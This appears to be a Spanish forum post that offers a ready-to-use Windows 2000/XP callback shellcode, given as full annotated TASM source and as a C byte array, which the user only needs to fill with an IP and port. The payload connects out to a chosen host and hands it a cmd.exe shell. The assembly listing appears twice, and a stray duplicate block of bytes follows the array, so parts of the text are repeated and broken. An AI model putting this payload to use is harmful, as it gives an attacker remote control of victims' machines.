
La shellcode original es de Brett Moore, pero tiene bastantes modificaciones para hacerla compatible con 2k/XP, además de no necesitar offsets (hace escaneos de memoria para encontrar las APIs).
Lo único que hay que hacer es meterle la IP y el puerto.

bmoore.asm
;*********************************** Christmas Shells***************************************
; Callback Shell.
; Directly set std handles and call system()
;
; 220 (DCh) bytes
;
; its not code, its antic0de
; and it works now too %-)
; Left it in tasm format.
; tasm32 -ml /m5 bmoore.asm
; tlink32 -Tpe -c -x bmoore.obj ,,, import32
;
;*********************************** Christmas Shells***************************************
; Jimminy jellicas its been jimplemented.
; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
; All the o/s peeps who know whats what.
;*******************************************************************************************
;//bmoore
;
; Tested working on Win2k SP4 Server,Pro and WinXP SP1a Pro Eng.
;//class101
.586p                                   ; Pentium instruction set, privileged forms allowed (none are used)
locals                                  ; TASM @@-local labels enabled; the file only uses plain labels
.model flat, stdcall
extrn ExitProcess:PROC                  ; NOTE(review): declared but never called - the WSAStartup failure path runs off the end of .code
extrn WSAStartup:PROC                   ; harness only: brings Winsock up before the payload runs
extrn WSACleanup:PROC
.data
; Hand-rolled WSADATA so WSAStartup has a buffer to fill.
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?                       ; NOTE(review): Winsock's WSADATA ends in a 4-byte pointer here; as a word this struct is 2 bytes short, so WSAStartup writes 2 bytes past `wsadata`
WSAdata ends
wsadata WSAdata <?>
.code
;****************************************************************************
; Winsock + copy to stack code
;****************************************************************************
start:
; Test harness, not part of the payload: initialise Winsock 1.1, then copy
; realstart..codeend onto the stack and jump there, which exercises the
; payload's position independence.
push offset wsadata
push 0101h                              ; requested version 1.1
call WSAStartup
or eax, eax                             ; 0 = success
jz winsock_found
jmp codeend                             ; NOTE(review): no instruction follows codeend, so failure runs off the end of .code instead of calling ExitProcess
winsock_found:
mov ebx,offset realstart                ; ebx = source cursor
sub esp,400h                            ; 1024-byte stack buffer; the payload is 220 bytes (see header)
mov eax,esp                             ; eax = destination cursor
Copyit:
mov cl,byte ptr [ebx]
mov byte ptr [eax],cl
inc eax
inc ebx
cmp ebx,offset codeend
jle Copyit                              ; copies through the byte at codeend inclusive; signed compare on an address (jbe is the unsigned form)
jmp esp                                 ; execute the copy from the stack - only works where the stack is executable
;****************************************************************************
; This is the start of the shell code
;****************************************************************************
realstart:
; Position-independent payload: everything from realstart to codeend is what
; the loader above copies to the stack and what the C byte listing below
; encodes. Register roles on the resolver path (no ABI hygiene here - the
; payload owns the thread):
;   edi - write cursor of the resolved-function table (filled by stosd)
;   ebx - read cursor walking the `hashes` table BACKWARDS from its last byte
;   edx - base of the module currently being searched
;   ebp - frame pointer: [ebp-4], [ebp-8], [ebp-0Ch] hold export-table pointers
jmp over_data                           ; hop over the embedded data (21h = 33 bytes)
; Connection target. The C listing marks bytes 3-4 as the port and 5-8 as the
; IPv4 address (7fh,00h,00h,01h = 127.0.0.1 in this listing). The 01h in the
; second byte is load-bearing: it is the marker that ends the backward table
; walk below, and it is decremented to 00h just before the connect-style call
; so the first word then reads 02h,00h.
sockdat db 02h,01h,00h,065h
db 07fh,00h,00h,01h
; Lookup table, consumed from the END by ebx: 16-bit name hashes, each 6-char
; DLL name followed by a 01h separator. The separator is turned into 00h so the
; name becomes a NUL-terminated string before it is handed to the first
; resolved function. Effective walk order: 4E2Ch, 817Ch (module found via the
; PEB), load "WS2_32", 8AD4h, 422Ah, load "MSVCRT", 364Ah, stop at sockdat's
; 01h. The resolved pointers land in the table in that order (slots 0..4).
hashes db 01h
dw 364Ah
db "MSVCRT",01
dw 422Ah
dw 8AD4h
db "WS2_32",01
dw 817Ch
dw 4E2Ch
over_data:
; GetPC: the pushed dword decodes as `pop edi / push edi / ret` (5Fh 57h C3h;
; the ACh byte is never executed), so `call esp` comes back with edi = address
; of the instruction after the call. Resolved pointers are later stored over
; this already-executed prologue, which is why edi is never rebased.
push 0ACC3575Fh
call esp
; Module discovery through a HARD-CODED address: on 2k/XP the PEB sits at
; 7ffdf000h (+0Ch = Ldr); later Windows versions move it, which is the version
; dependence behind the "Tested working on Win2k/XP" note. Ldr+1Ch is the
; initialisation-order module list; the lodsd follows one link, so [eax+08h]
; is the DllBase of the list's SECOND entry (presumably kernel32 on these
; versions - not verified here).
mov esi,7ffdf00ch
lodsd                                   ; eax = [7ffdf00ch], esi = 7ffdf010h
push dword ptr [esi]                    ; [7ffdf010h]; stays on the stack until `pop edi` at Done_Finding
mov esi,[eax + 1ch]
lodsd
mov edx,[eax + 08h]                     ; edx = module base for the first lookup pass
push -8                                 ; popped into ebp by `leave`: edi-8 is table slot 0 on the first pass
lea ebx,[edi-8]                         ; ebx = last byte of `hashes` (edi is over_data+7)
LookupFunctions:
push esp
pop ebp                                 ; ebp = esp; [ebp] is the -8 / -16 pushed just before
; PE export-directory walk of module edx: [edx+3Ch] = e_lfanew, [PE+78h] =
; export-directory RVA, +1Ch = the three RVA-table fields. Each is rebased and
; pushed, so [ebp-4] = AddressOfFunctions, [ebp-8] = AddressOfNames,
; [ebp-0Ch] = AddressOfNameOrdinals.
mov ecx,dword ptr [edx + 3ch]
mov esi,dword ptr [ecx + edx + 78h]
lea esi,dword ptr [esi + edx + 1ch]
mov cl,3                                ; NOTE(review): only cl is set; the loop count relies on e_lfanew (still in ecx) being < 100h
StoreAddress:
lodsd
add eax,edx
push eax
loop short StoreAddress
SearchStart:
dec ebx                                 ; step back onto the next 16-bit hash
mov esi,dword ptr [ebp - 8]             ; esi = AddressOfNames
xor eax,eax                             ; eax = running name index
push eax
Search:
push eax                                ; keep the index across the hash loop
lodsd
add eax,edx                             ; eax -> exported name
xor ecx,ecx
; 16-bit hash of the name: cx += word at [eax], cl += byte at [eax], advance,
; until the next byte is < 1 (the NUL terminator; the compare is signed, so a
; byte >= 80h would also end it - exported names are ASCII, so it does not).
hashy:
add cx,word ptr [eax]
add cl,byte ptr [eax]
inc eax
cmp byte ptr [eax],01
jge hashy
pop eax
inc eax                                 ; eax = index + 1 of the name just hashed
cmp cx,[ebx]                            ; compare with the table entry
jne Search                              ; NOTE(review): unbounded - a hash with no match walks esi off the end of the name table
; Match: ordinal = AddressOfNameOrdinals[index]; address = base + AddressOfFunctions[ordinal]
pop esi                                 ; the 0 pushed at SearchStart
xchg esi,eax                            ; esi = index + 1
dec esi
shl esi,1                               ; ordinals are 16-bit
add esi,dword ptr [ebp - 0ch]
lodsw
shl eax,2                               ; function RVAs are 32-bit
add eax,dword ptr [ebp - 4h]
xchg esi,eax
lodsd
add eax,edx
stosd                                   ; append to the table at edi
dec ebx
cmp byte ptr [ebx],01h                  ; 01h = no more hashes for this module
jne short SearchStart
leave                                   ; discard the three pointers; ebp = the -8 / -16 from before LookupFunctions
dec byte ptr [ebx]                      ; 01h -> 00h: NUL-terminates the DLL name that precedes it (on the last pass it is the 01h of `hashes`)
sub ebx,06h                             ; ebx -> first char of that 6-char name
;//bmoore
cmp byte ptr [ebx-1],01h                ; the 01h inside sockdat: every module has been processed
je short Done_Finding
;//class101
push ebx                                ; the DLL name
call dword ptr [edi + ebp]              ; table slot 0 (edi-8 on the first pass, edi-16 on the next)
xchg edx,eax                            ; edx = base of the module just loaded
push -16                                ; slot-0 offset for the next pass: edi will be 16 bytes past slot 0
dec ebx                                 ; ebx -> high byte of the next hash
jne short LookupFunctions               ; ebx is a pointer into the payload, never 0: always taken
;//bmoore
; Padding from the class101 revision; not reached on the path above, since the
; jne is always taken.
nop
nop
nop
nop
nop
nop
;//class101
Done_Finding:
xchg eax,ebp                            ; ebp = last resolved pointer (slot 4, from MSVCRT); eax = -16
call [EDI - 10h]                        ; slot 1 (edi is 20 past slot 0 here), called with no arguments pushed
; Six arguments 2,1,0,0,0,0 (pushed right to left) through slot 3: the
; WSASocket-style (AF_INET, SOCK_STREAM, ...) argument pattern; eax = handle.
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
inc ecx
push ecx
inc ecx
push ecx
call [EDI - 08h]
xchg ecx,edi                            ; ecx = end of the table; edi is now free
pop edi                                 ; the [7ffdf010h] value pushed right after GetPC
add edi,18h
stosd                                   ; "Directly set std handles" (header): the handle is written into three
stosd                                   ; consecutive dwords at +18h of that block - presumably the std in/out/err
stosd                                   ; slots of the process parameters; confirm against the 2k/XP PEB layout
dec ebx                                 ; ebx -> sockdat+1 (the 01h)
dec byte ptr [ebx]                      ; -> 00h, so sockdat now begins 02h,00h
dec ebx                                 ; ebx -> sockdat
push ebx                                ; 3rd arg: ebx itself doubles as the length (a pointer value, not 10h)
push ebx                                ; 2nd arg: &sockdat
push eax                                ; 1st arg: the handle
call [ecx - 0ch]                        ; slot 2: connect-style call (handle, &sockdat, len)
; "cmd",0 built without a NUL byte in the encoded immediate:
; 01656E64h - 01010101h = 00646D63h = 63h 6Dh 64h 00h little-endian.
mov eax,1656E64h
sub eax,01010101h
push eax
push esp                                ; pointer to the string on the stack
call ebp                                ; slot 4: system("cmd") per the header
nop                                     ; the C byte listing ends on this byte (...\xFF\xD5\x90)
call WSACleanup                         ; harness only: a link-time relative call, not part of the extracted bytes
codeend:
end start
;//bmoore
---------EOF
; Callback Shell.
; Directly set std handles and call system()
;
; 220 (DCh) bytes
;
; its not code, its antic0de
; and it works now too %-)
; Left it in tasm format.
; tasm32 -ml /m5 bmoore.asm
; tlink32 -Tpe -c -x bmoore.obj ,,, import32
;
;*********************************** Christmas Shells***************************************
; Jimminy jellicas its been jimplemented.
; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
; All the o/s peeps who know whats what.
;*******************************************************************************************
;//bmoore
;
; Tested working on Win2k SP4 Server,Pro and WinXP SP1a Pro Eng.
;//class101
.586p                                   ; Pentium instruction set, privileged forms allowed (none are used)
locals                                  ; TASM @@-local labels enabled; the file only uses plain labels
.model flat, stdcall
extrn ExitProcess:PROC                  ; NOTE(review): declared but never called - the WSAStartup failure path runs off the end of .code
extrn WSAStartup:PROC                   ; harness only: brings Winsock up before the payload runs
extrn WSACleanup:PROC
.data
; Hand-rolled WSADATA so WSAStartup has a buffer to fill.
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?                       ; NOTE(review): Winsock's WSADATA ends in a 4-byte pointer here; as a word this struct is 2 bytes short, so WSAStartup writes 2 bytes past `wsadata`
WSAdata ends
wsadata WSAdata <?>
.code
;****************************************************************************
; Winsock + copy to stack code
;****************************************************************************
start:
; Test harness, not part of the payload: initialise Winsock 1.1, then copy
; realstart..codeend onto the stack and jump there, which exercises the
; payload's position independence.
push offset wsadata
push 0101h                              ; requested version 1.1
call WSAStartup
or eax, eax                             ; 0 = success
jz winsock_found
jmp codeend                             ; NOTE(review): no instruction follows codeend, so failure runs off the end of .code instead of calling ExitProcess
winsock_found:
mov ebx,offset realstart                ; ebx = source cursor
sub esp,400h                            ; 1024-byte stack buffer; the payload is 220 bytes (see header)
mov eax,esp                             ; eax = destination cursor
Copyit:
mov cl,byte ptr [ebx]
mov byte ptr [eax],cl
inc eax
inc ebx
cmp ebx,offset codeend
jle Copyit                              ; copies through the byte at codeend inclusive; signed compare on an address (jbe is the unsigned form)
jmp esp                                 ; execute the copy from the stack - only works where the stack is executable
;****************************************************************************
; This is the start of the shell code
;****************************************************************************
realstart:
; Position-independent payload: everything from realstart to codeend is what
; the loader above copies to the stack and what the C byte listing below
; encodes. Register roles on the resolver path (no ABI hygiene here - the
; payload owns the thread):
;   edi - write cursor of the resolved-function table (filled by stosd)
;   ebx - read cursor walking the `hashes` table BACKWARDS from its last byte
;   edx - base of the module currently being searched
;   ebp - frame pointer: [ebp-4], [ebp-8], [ebp-0Ch] hold export-table pointers
jmp over_data                           ; hop over the embedded data (21h = 33 bytes)
; Connection target. The C listing marks bytes 3-4 as the port and 5-8 as the
; IPv4 address (7fh,00h,00h,01h = 127.0.0.1 in this listing). The 01h in the
; second byte is load-bearing: it is the marker that ends the backward table
; walk below, and it is decremented to 00h just before the connect-style call
; so the first word then reads 02h,00h.
sockdat db 02h,01h,00h,065h
db 07fh,00h,00h,01h
; Lookup table, consumed from the END by ebx: 16-bit name hashes, each 6-char
; DLL name followed by a 01h separator. The separator is turned into 00h so the
; name becomes a NUL-terminated string before it is handed to the first
; resolved function. Effective walk order: 4E2Ch, 817Ch (module found via the
; PEB), load "WS2_32", 8AD4h, 422Ah, load "MSVCRT", 364Ah, stop at sockdat's
; 01h. The resolved pointers land in the table in that order (slots 0..4).
hashes db 01h
dw 364Ah
db "MSVCRT",01
dw 422Ah
dw 8AD4h
db "WS2_32",01
dw 817Ch
dw 4E2Ch
over_data:
; GetPC: the pushed dword decodes as `pop edi / push edi / ret` (5Fh 57h C3h;
; the ACh byte is never executed), so `call esp` comes back with edi = address
; of the instruction after the call. Resolved pointers are later stored over
; this already-executed prologue, which is why edi is never rebased.
push 0ACC3575Fh
call esp
; Module discovery through a HARD-CODED address: on 2k/XP the PEB sits at
; 7ffdf000h (+0Ch = Ldr); later Windows versions move it, which is the version
; dependence behind the "Tested working on Win2k/XP" note. Ldr+1Ch is the
; initialisation-order module list; the lodsd follows one link, so [eax+08h]
; is the DllBase of the list's SECOND entry (presumably kernel32 on these
; versions - not verified here).
mov esi,7ffdf00ch
lodsd                                   ; eax = [7ffdf00ch], esi = 7ffdf010h
push dword ptr [esi]                    ; [7ffdf010h]; stays on the stack until `pop edi` at Done_Finding
mov esi,[eax + 1ch]
lodsd
mov edx,[eax + 08h]                     ; edx = module base for the first lookup pass
push -8                                 ; popped into ebp by `leave`: edi-8 is table slot 0 on the first pass
lea ebx,[edi-8]                         ; ebx = last byte of `hashes` (edi is over_data+7)
LookupFunctions:
push esp
pop ebp                                 ; ebp = esp; [ebp] is the -8 / -16 pushed just before
; PE export-directory walk of module edx: [edx+3Ch] = e_lfanew, [PE+78h] =
; export-directory RVA, +1Ch = the three RVA-table fields. Each is rebased and
; pushed, so [ebp-4] = AddressOfFunctions, [ebp-8] = AddressOfNames,
; [ebp-0Ch] = AddressOfNameOrdinals.
mov ecx,dword ptr [edx + 3ch]
mov esi,dword ptr [ecx + edx + 78h]
lea esi,dword ptr [esi + edx + 1ch]
mov cl,3                                ; NOTE(review): only cl is set; the loop count relies on e_lfanew (still in ecx) being < 100h
StoreAddress:
lodsd
add eax,edx
push eax
loop short StoreAddress
SearchStart:
dec ebx                                 ; step back onto the next 16-bit hash
mov esi,dword ptr [ebp - 8]             ; esi = AddressOfNames
xor eax,eax                             ; eax = running name index
push eax
Search:
push eax                                ; keep the index across the hash loop
lodsd
add eax,edx                             ; eax -> exported name
xor ecx,ecx
; 16-bit hash of the name: cx += word at [eax], cl += byte at [eax], advance,
; until the next byte is < 1 (the NUL terminator; the compare is signed, so a
; byte >= 80h would also end it - exported names are ASCII, so it does not).
hashy:
add cx,word ptr [eax]
add cl,byte ptr [eax]
inc eax
cmp byte ptr [eax],01
jge hashy
pop eax
inc eax                                 ; eax = index + 1 of the name just hashed
cmp cx,[ebx]                            ; compare with the table entry
jne Search                              ; NOTE(review): unbounded - a hash with no match walks esi off the end of the name table
; Match: ordinal = AddressOfNameOrdinals[index]; address = base + AddressOfFunctions[ordinal]
pop esi                                 ; the 0 pushed at SearchStart
xchg esi,eax                            ; esi = index + 1
dec esi
shl esi,1                               ; ordinals are 16-bit
add esi,dword ptr [ebp - 0ch]
lodsw
shl eax,2                               ; function RVAs are 32-bit
add eax,dword ptr [ebp - 4h]
xchg esi,eax
lodsd
add eax,edx
stosd                                   ; append to the table at edi
dec ebx
cmp byte ptr [ebx],01h                  ; 01h = no more hashes for this module
jne short SearchStart
leave                                   ; discard the three pointers; ebp = the -8 / -16 from before LookupFunctions
dec byte ptr [ebx]                      ; 01h -> 00h: NUL-terminates the DLL name that precedes it (on the last pass it is the 01h of `hashes`)
sub ebx,06h                             ; ebx -> first char of that 6-char name
;//bmoore
cmp byte ptr [ebx-1],01h                ; the 01h inside sockdat: every module has been processed
je short Done_Finding
;//class101
push ebx                                ; the DLL name
call dword ptr [edi + ebp]              ; table slot 0 (edi-8 on the first pass, edi-16 on the next)
xchg edx,eax                            ; edx = base of the module just loaded
push -16                                ; slot-0 offset for the next pass: edi will be 16 bytes past slot 0
dec ebx                                 ; ebx -> high byte of the next hash
jne short LookupFunctions               ; ebx is a pointer into the payload, never 0: always taken
;//bmoore
; Padding from the class101 revision; not reached on the path above, since the
; jne is always taken.
nop
nop
nop
nop
nop
nop
;//class101
Done_Finding:
xchg eax,ebp                            ; ebp = last resolved pointer (slot 4, from MSVCRT); eax = -16
call [EDI - 10h]                        ; slot 1 (edi is 20 past slot 0 here), called with no arguments pushed
; Six arguments 2,1,0,0,0,0 (pushed right to left) through slot 3: the
; WSASocket-style (AF_INET, SOCK_STREAM, ...) argument pattern; eax = handle.
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
inc ecx
push ecx
inc ecx
push ecx
call [EDI - 08h]
xchg ecx,edi                            ; ecx = end of the table; edi is now free
pop edi                                 ; the [7ffdf010h] value pushed right after GetPC
add edi,18h
stosd                                   ; "Directly set std handles" (header): the handle is written into three
stosd                                   ; consecutive dwords at +18h of that block - presumably the std in/out/err
stosd                                   ; slots of the process parameters; confirm against the 2k/XP PEB layout
dec ebx                                 ; ebx -> sockdat+1 (the 01h)
dec byte ptr [ebx]                      ; -> 00h, so sockdat now begins 02h,00h
dec ebx                                 ; ebx -> sockdat
push ebx                                ; 3rd arg: ebx itself doubles as the length (a pointer value, not 10h)
push ebx                                ; 2nd arg: &sockdat
push eax                                ; 1st arg: the handle
call [ecx - 0ch]                        ; slot 2: connect-style call (handle, &sockdat, len)
; "cmd",0 built without a NUL byte in the encoded immediate:
; 01656E64h - 01010101h = 00646D63h = 63h 6Dh 64h 00h little-endian.
mov eax,1656E64h
sub eax,01010101h
push eax
push esp                                ; pointer to the string on the stack
call ebp                                ; slot 4: system("cmd") per the header
nop                                     ; the C byte listing ends on this byte (...\xFF\xD5\x90)
call WSACleanup                         ; harness only: a link-time relative call, not part of the extracted bytes
codeend:
end start
;//bmoore
---------EOF
Y ahora, los opcodes en C:
char scode[] =
/* Byte-for-byte encoding of realstart..codeend from bmoore.asm above
 * (220 bytes per the asm header). \xEB\x21 is the `jmp over_data`; \x02\x01
 * starts sockdat. The port and IP fields are zeroed here, whereas the asm
 * listing carries 127.0.0.1 in the same slots. The array ends on the \x90
 * that precedes the harness-only `call WSACleanup`. */
"\xEB\x21\x02\x01"
"\x00\x00" //port
"\x00\x00\x00\x00" //ip
"\x01\x4A\x36\x4D\x53\x56"
"\x43\x52\x54\x01\x2A\x42\xD4\x8A\x57\x53\x32\x5F\x33\x32\x01\x7C"
"\x81\x2C\x4E\x68\x5F\x57\xC3\xAC\xFF\xD4\xBE\x0C\xF0\xFD\x7F\xAD"
"\xFF\x36\x8B\x70\x1C\xAD\x8B\x50\x08\x6A\xF8\x8D\x5F\xF8\x54\x5D"
"\x8B\x4A\x3C\x8B\x74\x11\x78\x8D\x74\x16\x1C\xB1\x03\xAD\x03\xC2"
"\x50\xE2\xFA\x4B\x8B\x75\xF8\x33\xC0\x50\x50\xAD\x03\xC2\x33\xC9"
"\x66\x03\x08\x02\x08\x40\x80\x38\x01\x7D\xF5\x58\x40\x66\x3B\x0B"
"\x75\xE8\x5E\x96\x4E\xD1\xE6\x03\x75\xF4\x66\xAD\xC1\xE0\x02\x03"
"\x45\xFC\x96\xAD\x03\xC2\xAB\x4B\x80\x3B\x01\x75\xC6\xC9\xFE\x0B"
"\x83\xEB\x06\x80\x7B\xFF\x01\x74\x10\x53\xFF\x14\x2F\x92\x6A\xF0"
"\x4B\x75\x9B\x90\x90\x90\x90\x90\x90\x95\xFF\x57\xF0\x33\xC9\x51"
"\x51\x51\x51\x41\x51\x41\x51\xFF\x57\xF8\x87\xCF\x5F\x83\xC7\x18"
"\xAB\xAB\xAB\x4B\xFE\x0B\x4B\x53\x53\x50\xFF\x51\xF4\xB8\x64\x6E"
"\x65\x01\x2D\x01\x01\x01\x01\x50\x54\xFF\xD5\x90";
/* NOTE(review): stray duplicate of the tail of the scode[] initializer above,
 * left here without a declaration and with the first line (\xEB\x21\x02\x01)
 * missing; the array above was already closed with `";`, so this does not
 * compile as written and should be dropped when the listing is copied. */
"\x00\x00" //port
"\x00\x00\x00\x00" //ip
"\x01\x4A\x36\x4D\x53\x56"
"\x43\x52\x54\x01\x2A\x42\xD4\x8A\x57\x53\x32\x5F\x33\x32\x01\x7C"
"\x81\x2C\x4E\x68\x5F\x57\xC3\xAC\xFF\xD4\xBE\x0C\xF0\xFD\x7F\xAD"
"\xFF\x36\x8B\x70\x1C\xAD\x8B\x50\x08\x6A\xF8\x8D\x5F\xF8\x54\x5D"
"\x8B\x4A\x3C\x8B\x74\x11\x78\x8D\x74\x16\x1C\xB1\x03\xAD\x03\xC2"
"\x50\xE2\xFA\x4B\x8B\x75\xF8\x33\xC0\x50\x50\xAD\x03\xC2\x33\xC9"
"\x66\x03\x08\x02\x08\x40\x80\x38\x01\x7D\xF5\x58\x40\x66\x3B\x0B"
"\x75\xE8\x5E\x96\x4E\xD1\xE6\x03\x75\xF4\x66\xAD\xC1\xE0\x02\x03"
"\x45\xFC\x96\xAD\x03\xC2\xAB\x4B\x80\x3B\x01\x75\xC6\xC9\xFE\x0B"
"\x83\xEB\x06\x80\x7B\xFF\x01\x74\x10\x53\xFF\x14\x2F\x92\x6A\xF0"
"\x4B\x75\x9B\x90\x90\x90\x90\x90\x90\x95\xFF\x57\xF0\x33\xC9\x51"
"\x51\x51\x51\x41\x51\x41\x51\xFF\x57\xF8\x87\xCF\x5F\x83\xC7\x18"
"\xAB\xAB\xAB\x4B\xFE\x0B\x4B\x53\x53\x50\xFF\x51\xF4\xB8\x64\x6E"
"\x65\x01\x2D\x01\x01\x01\x01\x50\x54\xFF\xD5\x90";
Salu2

















